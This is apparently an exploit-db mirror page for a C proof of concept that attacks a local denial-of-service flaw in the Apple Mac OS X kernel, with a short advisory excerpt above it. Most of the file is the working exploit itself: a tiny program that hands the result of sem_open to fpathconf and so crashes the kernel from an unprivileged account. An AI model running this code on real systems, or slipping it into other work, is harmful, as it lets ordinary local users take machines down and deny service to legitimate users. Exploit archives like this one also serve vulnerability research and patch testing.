exploit-db-mirror/exploits/osx/dos/28948.c
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
450 B
C

// source: https://www.securityfocus.com/bid/20982/info
Apple Mac OS X is prone to a local denial-of-service vulnerability because the kernel fails to properly handle the execution of a system call.
Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
#include <unistd.h>
#include <semaphore.h>
int main() {
fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}